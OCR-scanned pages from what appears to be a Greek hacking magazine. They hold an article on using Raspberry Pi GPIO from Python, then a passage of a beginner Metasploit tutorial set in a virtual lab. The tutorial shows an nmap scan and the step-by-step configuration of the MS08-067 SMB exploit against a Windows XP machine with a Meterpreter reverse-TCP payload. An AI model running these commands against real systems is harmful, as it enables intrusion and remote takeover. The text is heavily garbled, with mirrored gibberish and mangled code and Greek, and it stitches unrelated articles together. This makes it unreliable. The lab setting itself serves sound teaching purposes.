ano μερικὲς βασικὲς βιβλιοθήκες, οι οποἰες διευκολύνουν σε μεγάλο Bað- 
HO τον προγραμματισμὀ Tou Arduino. Στο Raspberry Pi τα πράγματα εἰ- 
vai διαφορετικἁ, εφόσον μιλάμε για Eva σύστημα το οποίο εκτελεἰ ἠδη 
ἑνα npóypauga: Το δικό του λειτουργικὀ σύστημα! Πα να φτιάξουμε Eva 
πρὀγραμμα για To Raspberry Pi σε C ἡ σε C++, θα χρειαζόταν να εγκα- 
ταστήσουµε Eva κἀρο προγράµµατα στον υπολογιστή µας. Θα χρειαζὀ- 
µασταν ano cross-compilers μέχρι όλες τις βιβλιοθήκες της C. Ευτυχώς, 
υπάρχει pia απλούστερη λύση: Μπορούμε να γράφουμε προγράµµατα για 
TO Raspberry Pi σε Python! Ἔτσι, avri va εγκαταστήσουµε pE- 

ρικὲς δεκάδες πακέτα στον υπολογιστή µας και va μπλέξου- 

µε σε Eva πέλαγος ρυθµμἰσεων, μπορούμε να κάνουμε κάτι 
μακρὰν απλούστερο: Να ξεκινήσουμε Eva SSH session 
προς ro Raspberry Pi, να τρἐξουµε τον αγαπημένο 
μας text editor! και να ξεκινήσουμε αμέσως τον 
προγραμματισμὀ του, σε µια γλῶσσα εὐκολη 
και γνώριμη! 


1. To nano, φυσικά! 


Το SoC ano την 
Broadcom, ro 
οποίο δίνει ζωή 
στο Raspberry Pi, 
θα μπορούσε va 
χαρακτηριστεί ως 
éva μικρὀ ἐργο 
τέχνης. Μέσα του 
κρύβεται ἑνας 
επεξεργαστής ARM, 
η μνήμη RAM, µια 
αρκετά ισχυρή GPU 
και πολλά ἄλλα 
καλούδια! 


Στην αντίπερα 
ὀχθη, ο μικροελε- 
γκτἠς που εμψυχώ- 
νει TO Arduino 

εἶναι ασύγκριτα πιο 
αδύναμος. Ωστόσο, 
η φύση της πλατ- 
φόρμας επιτρέπει 
την ανάπτυξη 
εφαρμογών που 
απαιτούν Tepdotia 
χρονική ακρίβεια 
(time critical 
applications). To 
γεγονός αυτό, σε 
συνδυασμό HE TNV 
εύκολη υποστήριξη 
ορισμένων πρωτο- 
κόλλων επικοινων!- 
ac (SPI, UART, 126, 
K.d.) καθιστούν TO 
Arduino ιδανικὀ για 
πολλὲς εφαρμογές. 
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O npoypappati- ; | x 
σμὀς Tou Arduino ΞΘ τ 


πραγματοποιείται x z 

αποκλειστικό 
απὀ το Arduino 
IDE. Πατώντας ro 
κουμπί Upload, ro 
πρὀγραμμά µας Blink 
μεταγλωττίζεται 
κι ανεβαίνει στην 
πλακέτα χωρίς Blink 

καμία ιδιαίτερη Turns on an LED on for one second, then off for on 
προσπάθεια απὀ 
μέρους µας. 


i* 


This example code is in the public domain. 
xi 


// Pin 13 has an LED connected on most Arduino boards. 
// give it a name: 
int led = 13; 


// the setup routine runs once when you press reset: 
void setup() { 
// initialize the digital pin as an output. 
pinMode([led, OUTPUT); 


// the loop routine runs over and over again forever: 
void loopí) { 


< 


Αν σκοπεύουµε 

va χρησιμοποιή- 
σουµε ra GPIO pin 
rou Raspberry Pi, 
καλό θα ήταν να i Arduino Uno o 
προμηθευτούµε µια 
πλακέτα για την 


εὐκολη πρόσβαση Python και RPi.GPIO 


τους ακροδέκτες. ; . : i ] 
To Raspberry Pi Πα τη χρήση rou Raspberry Pi ως Arduino θα βασιστούµε στην enion- 


Cobbler κάνει μη διανομή Linux που συνοδεύει την πλατφόρμα: ro Raspbian. H ἐκ- 
ακριβώς αυτή τη δοση nou χρησιµοποιήσαμε εμείς εἶναι εκείνη µε ημερομηνία 
δουλειά. έκδοσης 16/12/2012 και τη στιγμὴ που γράφονταν αυτές oi 
γραμμές αποτελούσε την πλέον πρόσφατη. Οι παλιότερες 
εκδόσεις ενδέχεται να µη διαθέτουν τα απαραίτητα πακέτα 

και εἶναι πιθανὀ να παρουσιαστούν διάφορα προβλήμα- 

τα. Επομένως, πριν αρχίσουμε τους πειραματισμούς µε 

την Python, θα ἦταν φρόνιμο να αναβαθµἰσουµε το oÙ- 
στηµα στην τελευταία ἐκδοση. 


Ὅσα γνωρίζουμε yia τη γλὠσσα Python εξακολουθούν 
να ισχύουν και μάλιστα στο ακἐραιο. Μπορούμε να xpn- 
σιµοποιήσουµε ελεύθερα οποιαδήποτε βιβλιοθήκη θέλουμε. 

Μπορούμε va παἰξουμε ακόµα και µε TO Pygame, που γνωρίσαμε 
στη σειρἁἀ ἄρθρων Python Game Programming, στα τεύχη and το 
005 έως και ro 011 rou deltaHacker. (Σ.τ.Ε. Ουσιαστικά, πρὀκειται για 
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σειρὰ εκμάθησης της γλὠσσας Python 
μέσα and την κατασκευὴ του δικού 
μας computer game.) 


AUTO σημαίνει OT! διαθέτουμε την £U- 
ελιξία και την ισχύ µιας ολοκληρωμέ- 
νης γλὠσσας προγραμματισμού. Έτσι, 
µε όλα óoa θα δούμε, ro Raspberry Pi δεν θα εξισωθεί µε το Arduino, 
αλλά θα γίνει µια πολύ πιο ισχυρή εκδοχἠ του! 


H βιβλιοθήκη που απαιτείται yia να αποκτήσουμε πρόσβαση στους ακρο- 
δέκτες τους SOC ονομάζεται RPi.GPIO και εἶναι ἠδη εγκατεστημένη στην 
τελευταία ἐκδοση rou Raspbian. To μόνο που έχουμε να κάνουμε εμείς 
εἶναι va την συμπεριλάβουμε στο πρὀγραμμὰ µας. Εδὠ πρέπει va Tovi- 
coupe µια σημαντικὴ λεπτομέρεια: H εν λὀγω βιβλιοθήκη διαθέτει συναρ- 
τήσεις yia το βασικὀ χειρισμό των ακροδεκτὠν του Raspberry Pi και δεν 
παρέχει υποστήριξη για πρωτόκολλα επικοινωνίας τα οποία χρησιµοποι- 
οὖν πολλαπλά pin (SPI, 126, UART k.d.). Έτσι, αν θέλουμε η κατασκευἠ 
μας να επικοινωνεἰ µε κἀποιο εξάρτηµα µέσω SPI, καλὸ θα ἦταν να στρα- 
φούμε στο Arduino. Ekei, η δουλειά µας θα γίνει πολὺ πιο άνετα. Αν πάλι 
έχουμε ανάγκη την επεξεργαστικἠ ισχύ του Raspberry Pi, τότε θα πρέπει 
να ξεχάσουμε την Python και να στραφούμε σε nio hardcore λύσεις. Ας 
δούμε τώρα μερικὲς συναρτήσεις της βιβλιοθήκης RPi.GPIO, οι οποἰες 
κάνουν ro Raspberry Pi να μοιάζει µε To Arduino. 


e GPIO.setmode(GPIO.BOARD) / GPIO.setmode(GPIO.BCM). 
H συνάρτηση αυτή καθορίζει την ονομασία των ακροδεκτὠν που 
θα χρησιμοποιείται στο πρὀγραμμὰ µας. Βλέπετε, τα ελεύθερα pin 
του επεξεργαστἠ rou Raspberry Pi ¿xouv ano δύο ονόματα! Το ἑνα 
ὀνομα προκύπτει ano Tov τρόπο µε τον οποίο εἶναι αριθµημένοι 
οι ακροδέκτες του επεξεργαστή. Οι ακροδέκτες που µας ενδιαφέ- 
ρουν, όμως, καταλήγουν σε Eva ενιαίο header πάνω στην πλακέτα 
του Raspberry Pi. Έτσι, ¿xouv κι απὀ Eva δεύτερο ὀνομα, το οποίο 
προκύπτει anó τον τρόπο µε τον οποίο ονομάζονται/απαριθμούνται 
οι ακροδέκτες του συγκεκριμένου header. 


e GPIO.setup(PIN, GPIO.OUT) / GPIO.setup(PIN, GPIO.IN). 
Με την κατάλληλη παράμετρο σε αυτή τη συνάρτηση μπορούμε va 
καθορίσουμε τη βασικἠ λειτουργία του εκάστοτε ακροδέκτη. Όπως 
αντιλαμβάνεστε, μπορούμε να καθορίσουμε το av Eva pin θα ou- 
µπεριφἑρεται ως ψηφιακἠ ἐξοδος (GPIO.OUT) ἡ εἰσοδος (GPIO.IN). 
Αυτἠ η συνάρτηση δηλαδὴ αποτελεἰ το ισοδύναμο της συνάρτησης 
pinMode, που συναντάμε στο Arduino. 


e GPIO.output(PIN, GPIO.HIGH) / GPIO.output(PIN, GPIO.LOW). 
Νομίζουμε ὁτι η αποστολἠ αυτής της συνάρτησης εἰναι επίσης npo- 
@avnc! Με τη βοήθειά της, κι εφόσον ἐχουμε ρυθμίσει κάποιον 
ακροδέκτη σαν ψηφιακἠ ἐξοδο, μπορούμε να επιλέξουμε την επι- 
Ouunrr| λογικἠ κατάσταση (HIGH ἡ LOW). Εδώ πρέπει va θυμίσου- 
µε ότι o επεξεργαστἠς Tou Raspberry Pi λειτουργεί ora 3.3V. AUTÒ 
σημαίνει ὁτι το HIGH αντιστοιχεἰ στα 3.3V κι OXI τα 5V. 


ο GPIO.input(PIN). Κάποια στιγμή, ακόμα και στο πιο απλὀ npó- 
γραμμα, εἶναι σίγουρο OT! θα θελήσουμε να διαβάσουμε την κατά- 
σταση κάποιου ακροδέκτη. Πα το σκοπὀ αυτό, αρκεί να xpnoipo- 
ποιήσουμε την παραπάνω συνάρτηση... 


e GPIO.cleanup(). Av θελήσουμε va ακυρώσουμε Χόλες3 τις ρυθ- 


® python’ 


H Python εἶναι µια 
διερμηνευόµε- 

νη (interpreted) 
γλὠσσα. Αυτό µας 
γλιτώνει an’ την 
προετοιμασία TOU 
περιβάλλοντος 
για τον προ- 
γραμματισμὀ του 
Raspberry Pi. Δεν 
θα χρειαστούμε 
ούτε compiler, 
οὐτε linker, OUTE 
κανέναν ἄλλον 
σατανά ;) 


WV'HAGIKER 


ÁN 


µἰσεις που έχουμε κάνει στους ακροδέκτες TOU Raspberry Pi, αρκεἰ 
va καλέσουµε τη συγκεκριμένη συνάρτηση. Με αυτόν τον τρόπο 
όλα ra pin θα επιστρέψουν στην αρχικἠ τους κατάσταση. 


Η βιβλιοθήκη RPi.GPIO προσφέρει αρκετὲς ακόμα συναρτήσεις. Βέβαια, 
πολλὲς ano αυτὲς βρίσκονται ακόµα σε πειραματικὀ στάδιο ανάπτυξης και 
πρέπει va εἶμαστε ιδιαίτερα προσεκτικοί ὀταν τις χρησιμοποιούμε. Må- 
ντως οι παραπάνω πέντε λειτουργούν άψογα και παρ’ ὁλο που προσφέἑ- 
pouv απλοϊκὲς λειτουργίες, μπορούν να αποτελέσουν τη βάση για πολύ 
ενδιαφἑἐροντα project. Πα παράδειγµα, θα μπορούσαμε va συνδέσουμε 
στους ακροδέκτες κουμπιά κάποιο εἶδος τηλεχειρισμού ἡ κι ολόκληρα 
Ψηφιακά κυκλώματα, ὥστε να ελέγχουμε ἡ va αυτοματοποιήσουμε τη 
λειτουργία rou Raspberry Pi! Edm nou τα λέμε, η βιβλιοθήκη RPi.GPIO 
έχει φτιαχτεί καθαρὰ και µόνο για τέτοιου εἶδους εφαρμογές. Εξαιτίας 
της φύσης της Python αλλά και του Linux kernel, δεν θα μπορούμε va 
χρησιμοποιήσουμε ra GPIO yia time sensitive εφαρμογές — τουλάχι- 
στον ox! εὐκολα! Παρόλα αυτά μπορούμε πολύ άνετα να προσθέσουμε 
εὐκολα κουμπιά και διάφορα άλλα κυκλώματα εισόδου ἡ εξὁδου. Έτσι, 
θα μπορούσαμε να φτιάξουμε Eva uikpó Arcade cabinet, µε ορισμένους 
ακροδέκτες rou Raspberry Pi να χρησιμοποιούνται για τα χειριστήρια 
TOU naikrr και κάποιους ἄλλους να χρησιμοποιούνται για τη σύνδεση 
µιας μικρἠς οθὀνης, στην οποία θα εμφανίζονται τα διαθέσιµα credits, 
το τρέχον σκορ και πάει λέγοντας. Εναλλακτικἆ, κἄποιοι ακροδέκτες θα 
μπορούσαν να ελἐγχουν akópa και τον φωτισμό rou arcade cabinet... Με 
την ισχύ που προσφέρει To Raspberry Pi, οι δυνατότητες εἶναι πραγµατι- 
kå απεριὀριστες! Σας βάλαμε ιδέες, ἐτσι δεν εἶναι; Σε επόμενο άρθρο θα 
παρουσιάσουμε μερικὲς χειροπιαστἐς εφαρμογὲς και θα εξετάσουμε ὀλες 
τις OXETIKEG λεπτομέρειες. Μέχρι τότε, μπορείτε ν’ αφήσετε τη φαντασία 
σας να δημιουργήσει και, φυσικὰ, va ξεσκονἰσετε τις γνώσεις σας στην 
Python ;) 


Raspberry Pi Header 


5v 

DNC 
GND 
GPIO 15 
GPIO 16 
GPIO 1 


Στην εικὀνα φαίνεται TO 
header µε τους ελεύθερους 


ακροδέκτες TOU επεξεργαστή GPIO 12 

του Raspberry Pi. Δίπλα σε 

κάθε ακροδέκτη βλέπουμε GPIO 13 

και την ονομασία (βασικά 

τον αριθμό) µε τον οποίο GPIO 14 GPIO 10 
μπορούμε να αναφερθούμε 

στο εκάστοτε pin, μέσα απὀ DNC GPIO 11 


τα προγράμματά µας. 
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Υποθέτουμε ὁτι ο νεοφερμένος στην πλατφόρμα rou Metasploit έχει 
διαβάσει το άρθρο που αρχίζει ano τη σελἰδα 12 του παρὀντος τεύχους. 
Δουλεύουμε μέσα ano το περιβάλλον του BackTrack Linux, σε εικονικὀ ἡ 
αληθινό δίκτυο. Το προτιμότερο εἶναι το εικονικὀ, ὁπου πέρα ano ro VM 
µε το BackTrack υπάρχει τουλάχιστον ἆλλο éva, µε ro Metasploitable. 
Ακόμα καλύτερα, αν δεν το έχετε κάνει NON στἠστε ropa va εικονικὀ 
δίκτυο γύρω ano ro VirtualBox, ὁπως επιδεικνύεται στο 60 επεισόδιο της 
1ης σεζὀν rou deltaCast: 


http://deltahacker.gr/deltacast-s01e06 
Χωρίς ἄλλη καθυστέρηση, ας περάσουμε στο θέµα µας. 


Πρώτη επαφἠ µε το Framework 


Θα δουλέψουμε ano το msfconsole Tou Metasploit. Πα va το ξεκινήσετε, 
σ’ ἑνα παράθυρο τερματικού anAá δώστε 


root@bt:~# msfconsole 


Ίσως χρειαστεί να περιμένετε λἰγο, µιας και To Metasploit δεν εἶναι ano 
τις πιο μικρές πλατφόρμες που υπάρχουν — κάθε ἀλλο μάλιστα. Μόλις 
φορτώσει η κονσόλα rou Metasploit θα δείτε Eva ano τα διαθέσιμα 
banners και To prompt του Metasploit Framework. Μπορείτε τώρα va 
δίνετε διάφορες εντολὲς και uia απὀ τις χαριτωμένες εἶναι η banner, nou 
εμφανίζει διάφορα ASCII art. Δοκιμάστε τη λἰγο, αλλά µετά δώστε κι Eva 


msf » help 


για να δείτε όλες τις EvTOAEG που καταλαβαίνει ro Metasploit. Ρίξτε 
τους µια γρήγορη ματιὰ και µην σας απασχολεἰ οὐτε το πλήθος τους 
(εντάξει, δεν εἶναι και πάρα πολλές), OUTE η σημασία καθεμιάς. Σε λίγο θα 
εστιάσουµε σε μερικὲς σημαντικὲς εντολἑς, αλλά μέσα απὀ συγκεκριµένα 
παραδείγματα. 


Ανίχνευση μηχανημάτων 


Πριν κάνουμε οτιδήποτε pe ro Metasploit, καλό εἶναι να ἐχουμε µια ὁσο TO 
δυνατόν πληρέστερη άποψη του (εικονικού ἡ φυσικού) τοπικού δικτύου, 
μέσα στο onoio ὁδραστηριοποιούµαστε. ‘Eva ἀριστο εργαλείο γι΄ αυτή τη 
δουλειά εἶναι TO nmap, o εξαιρετικἀ δημοφιλἠς port scanner nou θα γίνει 
ἑνας ano τους καλὐτερούς σας φίλους -- av δηλαδἠ δεν εἶναι ἠδη. To 
nmap μπορούμε va το τρέξουμε cite απευθείας μέσα ano ro msfconsole 
eire ano κἄποιο ἆλλο παράθυρο τερματικού. Δείτε π.χ. πὼς σκανάραµε 
εμεὶς, το δικὀ µας TONIKO δίκτυο: 


root@bt:~# nmap -sS -Pn -A -oX ~/thelan.xml 192.168.56.0/24 
Ας δούμε λίγο τη σημασία των παραμέτρων που δώσαμε στο nmap. 
-SS Ζητάμε stealth TCP scan (δώστε man nmap για περισσότερες 
λεπτομέρειες). 


-Pn Δεν θέλουμε TO nmap να κάνει ping τους υπολογιστὲς (hosts), 
ὡστε να συμπεράνει αν εἰναι ενεργοὶ ἡ ὀχι. Αντίθετα, θα θεωρήσει 
oT! όλα τα hosts στο δίκτυο εἶναι ενεργά. 


-A Μ΄ αυτή την παράμετρο θα λάβουμε πληροφορίες για TO 
λειτουργικὀ σύστημα ká8e host, καθὼς και για τις (δικτυακές) 
υπηρεσίες που τρέχουν στο καθένα. 
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-oX Τα αποτελέσµατα της σάρωσης θέλουμε va αποθηκευτούν σε 
αρχείο (τύπου XLM), µε ὀνομα thelan.xml. Το αρχείο θα γραφτεί 
στον προσωπικὀ κατάλογο του χρήστη root, µέσα ano το 
λογαριασμό του οποίου ropa δουλεύουμε. 


Τέλος, µε αυτό το 192.168.56.0/24 εἰπαμε στο nmap va σαρώσει CAO 
το subnet μέσα στο οποίο βρισκόμαστε. Av οι υπολογιστές του δικού 
σας δικτύου ἐχουν διευθύνσεις της μορφής 192.168.1.*, τότε θα βάλετε 
192.168.1.0/24, αν ἐχουν διευθύνσεις της μορφής 10.0.0. θα βάλετε 
10.0.0.0/24 κ.ο.κ. Σε περίπτωση που αυτὴ η κάθετος µε το 24 σας 
Qaivovrai κάπως μυστήρια, τότε αξίζει να διαβάσετε το άρθρο nepi IP 
addressing και subnetting, στο site του περιοδικού: 


http://deltahacker.gr/2012/06/14/hownetsworkpart2b 


Το αρχείο XML που µας έδωσε ro nmap μπορούμε av θέλουμε να το 
ανοίξουμε και µέσα ano To Zenmap, ὥστε να κάνουμε µια ωραία κι άνετη 
επισκόπηση του τοπικού δικτύου, των ενεργὠν μηχανημάτων και των 
δικτυακών υπηρεσιών που τρέχει το καθένα. Στο BackTrack, Evac τρόπος 
για να τρἐξουµε το Zenmap εἶναι ακολουθώντας τη διαδροµἠ Applications 
> BackTrack > Information Gathering > Network Analysis > Network 
Scanners > Thessaloniki! > zenmap. Δίνουμε Eva [CTRL+0] κι ανοίγουμε 
το thelan.xml (ἡ ὁπως αλλιώς το έχουμε ονομάσει). Εξερευνήστε µε την 
ησυχία σας τα ευρήματα του nmap, µέσα απὀ το περιβάλλον του Ze- 
nmap. Λογικά, θα υπάρχει ἑνα host µε 23 ports ανοικτά! Αυτό εἶναι το 
Metasploitable, και για το δικὀ µας εργαστήριο (εικονικὀ δίκτυο) ἦταν το 
ΝΜ µε διεύθυνση 192.168.56.138. 


Ας δούμε ropa nog θα ενημερώσουμε το ἰδιο το Metasploit για τα 
αποτελέσµατα του nmap. Κάτι τέτοιο δεν εἶναι πάντα anapaitnto, 
όμως σε πολλὲς περιπτώσεις εἶναι ιδιαίτερα βολικὀ. Πα την αποθήκευση 
πληροφοριών που αφορούν σε hosts (κι OX! μόνο), το Metasploit 
χρησιμοποιεί την PostgreSQL. Δεν χρειάζεται ὀμως να ἐχουμε εμπειρία 
µε τη συγκεκριμένη βάση δεδομένων. Μέσα ano ro msfconsole, αρκεἰ va 
πληκτρολογήσουμε 


msf > db import ~/thelan.xml 

[*] Importing 'Nmap XML' data 

[*] Import: Parsing with 'Nokogiri v1.5.2 
[*] Importing host 192.168.56.5 

[*] Importing host 192.168.56.133 

[*] Importing host 192.168.56.138 

[*] Importing host 192.168.56.139 

[*] Importing host 192.168.56.141 

[*] Importing host 192.168.56.143 

[*] Successfully imported /root/thelan. xml 


msf > 


1. «ὗφος Στἀθη»Αυτὸ ἦταν για va δούμε αν προσέχετε, καταλάβατε; «/ύφος Στάθη» 
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Ὅπως βλέπετε, όλα τα μηχανήματα nou Bpke το nmap εισάγονται στη 
βάση. Με την εντολἠ hosts βλέπουμε πληροφορίες για όλα τα boxes? που 
avd πάσα στιγμὴ γνωρίζει το Metasploit. Προσέξτε ότι ro Metasploit ξέρει 
Πολλά περισσότερα an’ óoa Φφαΐνονται στην ἑξοδο της db. import. Δείτε: 


msf » services 


Services 

host port proto name state info 

«snip» 

192.168.56.133 80 tcp http open Apache httpd 2.2.14 (Ubuntu) 

192.168.56.138 445 tcp netbios-ssn open Samba smbd 3.X workgroup: 
WORKGROUP 

192.168.56.138 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 
protocol 2.0 

«snip» 

192.168.56.143 135 tcp msrpc open Microsoft Windows RPC 

192.168.56.143 139 tcp netbios-ssn open 

192.168.56.143 445 tcp netbios-ssn open 

«snip» 


Με την παραπάνω εντολἠ γίνεται mavepdo ὁτι To Metasploit ἐχει 
αποθηκεύσει στη βάση πληροφορίες περὶ *óAov* των δικτυακών 
υπηρεσιών nou τρέχουν σε *óAa* τα μηχανήματα του τοπικού δικτύου. 


Επιλογἠ στὀχου κι exploit 


Αν στο msfconsole πληκτρολογήσετε show θα πάρετε µια μακροσκελἠ 
λίστα ano όλα, pa ὁλα τα modules rou Metasploit. Αυτή η λίστα δεν 
εἶναι και πολὺ χρήσιμη, εκτὀς ἴσως απὀ το να δείχνει πόσα πολλά mod- 
ules έχει το Metasploit. Νέα modules προστίθενται διαρκώς στο Frame- 
work ενώ και Πολλά ano τα υπάρχοντα βελτιώνονται. Γενικά, εμπίπτουν 
στις κατηγορἰες encoders, nops, exploits, payloads, auxiliary και pl- 
ugins. Εµεἰς θέλουμε απλά va εξαπολύσουµε την πρώτη µας επίθεση, yr 
αυτὸ και θα εστιάσουµε την προσοχἠ µας στην karnyopia των exploits. 
Πληκτρολογώντας show exploits παίρνετε µια λίστα *Alyo* µικρὀτερη 
ano την προηγούµενη, αλλά κι αυτἠ θα εἶναι ιδιαιτερα µακροσκελἠς και 
πρακτικἁ άχρηστη: ro Metasploit διαθέτει περισσότερα ano 1000 exploit 
modules! Κάπου εδώ, λοιπὀν, οφείλουμε να πάρουμε μερικὲς αποφάσεις. 
Αν θυμόσαστε ano την ἐξοδο της εντολἠς services, στο TOMIKO µας 
δίκτυο υπάρχουν μηχανήματα µε ενεργοποιημένο το file sharing κατὰ 
το πρωτόκολλο SMB (Server Message Block). Αυτὸ Χρησιμοποιείται 
στο file sharing rov Windows, ro ἰδιο υλοποιείται κι ano τη SAMBA του 
Linux. Θα ψάξουμε λοιπὸν για κἀποιο exploit γύρω ano ro SMB και θα 
δοκιµάσουµε va επιτεθούµε σε κἄποιο μηχάνημα. H λέξη-κλειδί εδώ, 
λοιπὀν, εἶναι «SMB». H εντολἠ search smb θα επιστρέψει όλα ra modules, 


2. Σε OAO το κείμενο, οι OPO! «host», «box», «υπολογιστής» και «μηχάνημα» ¿xouv την ἴδια σημασία κι 
αναφἑρονται σε µια (EIKOVIK ἡ φυσική) συσκευή. 
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ano όλες τις κατηγορἰες nou µε τον vav ἡ τον ἄλλον τρόπο έχουν να 
κάνουν µε το SMB. Στο σηµείο auró παίρνουμε και µια δεύτερη απὀφαση: 
Na επιτεθούµε σε Eva μηχάνημα Windows — πάντα εκμεταλλευόμενοι 
κάποια αδυναμία του SMB. Πληκτρολογήστε: 


msf » search exploit/windows/smb 


Μόλις εμφανίστηκε µια λίστα µε ὁλα ra exploits nou αφορούν σε 
μηχανήματα Windows, µε ενεργοποιημένο το file sharing (kata SMB). 
Με την εντολἠ info παίρνουμε πληροφορίες για Eva συγκεκριµένο ex- 
ploit. Δώστε, N.X., info exploit/windows/smb/psexec. Ποιο an’ όλα αυτά 
τα exploits να επιλέξουμε για την πρώτη µας επίθεση; Παρατηρήστε ξανὰ 
την ἐξοδο της search exploit/windows/smb και συγκεκριµένα τη στήλη 
Rank. Σε αυτή βλέπουμε την αξιολόγηση nou ἐχει κάθε exploit, ως προς 
την αξιοπιστία και την αποτελεσματικὀτητἁ του. Περισσότερα επ’ αυτού 
µπορείτε να διαβάσετε και στη σχετικἠ σελίδα του Wiki, για τους devel- 
opers rou Metasploit: 


http://dev.metasploit.com/redmine/projects/framework/wiki/ 
Exploit_Ranking 


Ano ra exploits nou ropa βλέπουμε, παρατηρούμε OT! το msO8_067_ne- 
tapi ἐχει αξιολόγηση «great». To εἶπαμε και στο προηγούμενο άρθρο: Δεν 
εἶναι τυχαίο που όλοι το επιλέγουν για τις επιδείξεις τους! Αν δώσετε Eva 


msf > info windows/smb/ms08 067 netapi 


θα διαπιστώσετε ὁτι το exploit αφορά σε πολλὲς εκδόσεις κι εκδοχὲς των 
Windows. Μεταξὺ aurov εἰναι και τα Windows ΧΡ SP2 και, ὁπως εἶδαμε και 
στα αποτελέσµατα του nmap προηγουμένως, τέτοιο μηχάνημα πράγματι 
έχουμε στο τοπικὀ µας δίκτυο και το IP του εἶναι το 192.168.56.139. Ας 
του επιτεθούμε, λοιπόν! 


Επίθεση σε Windows box 

Με την EVTOAN use φορτώνουμε το exploit που ξεχωρἰσαμε πριν λἰγο: 
msf > use windows/smb/msO8 067 netapi 
msf  exploit(msO8 067 netapi) > 


Παρατηρήστε ὁτι ro prompt στο msfconsole ἀλλαξε, γεγονὸς nou 
σημαίνει ὁτι το exploit φορτώθηκε επιτυχώς και πλέον «λειτουργούμε» 
εντὸς του πλαισίου του. Ta exploits δέχονται παραμέτρους και για va 
δούμε ποιες ἐχουν νόημα για το ΠΙ50Ο8 067 netapi, δίνουμε: 


msf  exploit(ms08 067 netapi) > show options 
Module options (exploit/windows/smb/ms08 067 netapi): 


Name Current Setting Required Description 

RHOST yes The target address 

RPORT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes The pipe name to use 


(BROWSER, SRVSVC) 
Exploit target: 
Id Name 


0 Automatic Targeting 


niunqf xnur] Jjeu'burqe 

dX OpUIM 11050J2IM jeu 
niunqf xnuri 
xnuri 


αθλαθς asgeel4 "Durqeued: esu 


ο 


ο 
NNN 
NN NAN 


NNN 
NN 
σ 


Ον τ! (η 
oo 


τή 


ET 
oo 


co 
m mm 


m 


u 


əweu əweu 


]ux'ue19u1/1i004 / pə} 1odw 
EYT’ 9S'89T'Z burj40 
Ivl'9S'890l'7 BuT}40 
6ε195᾽89τ᾽ζ ou Βυτ}.10 
SET‘ 9S" 89T'Z bu 
££1'9S5'891'7 5 
S'96'89T'Z iodur [x 
Z'S'I^ ΤΙΤΒΟΧΟΝ, Ι1ΤΝ Bursaeg :3420du[ [+] 
eiep , ΙΧ dewy, δυτ1.Ι 


qjux-ue1eu3/- 1.103 


5Θ2845).ΙΟΜ əseqezep ΙΘΘΜΊΘά Yd TMS 
əseqezep əy} 59Τ1Τ1ΤΩ8.Ι 118 15Τη 
eseqejep ay} UT 59 118 15Τ1 
eseqejep ay} ur ) 118 15Τη 
eseqejep ay} u ) 119 15Τ1 
seqejep 118 15Τ1 
snjeis eseqejep əy} 
əy2eə ajnpou pa. -aseqe 60262 
jndino eui 391 p 
] 11Π5 e yod 
TuTe}UOD 91τ! 9 1JOdXj 
θ2υθ}5υτ 9Sseqejep juaJjJn2 Əy} woaz j2euuoo2srQ 
oeseqejep DurisTXe ue oj 128euuo) 


spueuuo? ΡΙΘ1288 


uOIS4J9A ÁjeIqI] 9]0suo2 pue Χ.ΙΟΜΘΙΙΘΙ} Əy} 
~ aqg3001| st ~ 3381001 
daH sqej ΙΘΟΙΗΗΘΙ ΜΘΙΛ PPI 9|4 
-παθαοοι x ^ v 


0ε:0ζ 2.64 T pd nh UlejsÁs 59284 suone» day N 
vOT T'S9T'26T 


A 
À 
ον 
EE 
os 
< N 
CS 
ex 
À 
σὰ 
EE: 
oN 
<À 
< À 
ὋΝ 
S 
-À 
E 
À 
À 
+À 
aN 
ον 
—S 
S 
aX 
πε 
S 
À 
N 
+¥ 
S 
wy 
À 
ZÀ 
À 
os 
ΗΝ 
3 
w X 
BE 
3 
N 
zt 
ER 
aÀ 
ΝΞΕῚ 
CY 
S 
S 
os 
A 
CE 
S 
=À 
N 
ων 
S 
<Ñ 
N 
w N 
N 
N 
ay 


98 


WV'HAGIKER 


ÁN 


Προφανώς, στη μεταβλητή RHOST npénei va αποδώσουμετη διεύθυνση IP 
του OTOXOU, που για TO συγκεκριµένο παράδειγµα εἶναι η 192.168.56.139. 
Προς τούτο, χρησιμοποιούμε την EVTOAN set: 


msf  exploit(ms08 067 netapi) > set RHOST 192.168.56.139 
RHOST -» 192.168.56.139 

msf  exploit(msO8 067 netapi) > show options 

Module options (exploit/windows/smb/ms08 067 netapi): 


Name Current Setting Required Description 

RHOST 192.168.56.139 yes The target address 

RPORT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes The pipe name to use 


(BROWSER, SRVSVC) 
Exploit target: 
Id Name 
0 Automatic Targeting 


Πολὺ ωραία, ro exploit µας εἶναι ἐτοιμο. Πριν εξαπολύσουμµε την επίθεση, 
ας δούμε ποια εἶναι τα διαθέσιµα payloads που έχουν νόημα για τον 
συγκεκριµένο στὀχο: 


msf  exploit(ms08 067 netapi) > show payloads 


Δεν εἶναι και λίγα, λέμε όμως va δοκιµάσουμµε εκεἰνο µε τον Meterpreter. 
Μιας και του NAEEGHE το εγκώμιο στο προηγούμενο ἆρθρο, ευκαιρἰα ropa 
να rov δοκιµάσουμµε και στην πράξη. 


msf  exploit(msO8 067 netapi) > set payload windows/meterpreter/ 
reverse tcp 


payload -» windows/meterpreter/reverse tcp 
Δείτε ἀλλη µια φορά τις παραμέτρους rou exploit µας: 
msf  exploit(msO8 067 netapi) > show options 


Module options (exploit/windows/smb/ms08 067 netapi): 


Name Current Setting Required Description 

RHOST 192.168.56.139 yes The target address 

RPORT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes The pipe name to use 


(BROWSER, SRVSVC) 
Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 


EXITFUNC thread yes Exit technique: seh, 
thread, process, none 


LHOST yes The listen address 
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LPORT 4444 yes The listen port 
Exploit target: 

Id Name 

0 Automatic Targeting 


Πλέον, εμφανίζονται και οι παράμετροι του payload nou μόλις επιλέξαμε 
και σε Aiyo θα χρησιμοποιηθεί κατά ro exploitation. Χρειάζεται ὁμως va 
αποδώσουµε τιµή στη μεταβλητή LHOST. Συγκεκριµένα, αυτή πρέπει va 
χει τη διεύθυνση IP του υπολογιστή στον onoio θα συνδεθεί ro payload, 
μόλις τρέξει στο μηχάνηµα-στόχο. Προφανώς και μιλάμε για το Back- 
Track box: το IP του δικού µας ἦταν 192.168.56.133. Για να βρείτε ro IP 
του δικού σας, σε µια κονσόλα πληκτρολογήστε 


